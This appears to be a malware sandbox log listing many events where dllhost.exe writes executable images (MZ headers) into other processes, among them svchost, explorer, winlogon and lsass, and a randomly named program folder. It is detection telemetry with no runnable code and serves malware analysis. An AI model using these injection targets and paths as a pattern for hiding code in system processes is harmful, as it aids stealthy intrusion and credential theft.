Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DBF9DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FB7270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 3310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 247B4700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1DAD8A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE3F3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EC87880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1C39C960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 10C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 20F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 15D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 26D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 1160CB60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 254A27C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 30C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 28E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 29F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 24D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1290000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\$nya-onimai2\qVrKPA.exe base: 1910E500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AA5E060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: B80000 value starts with: 4D5A
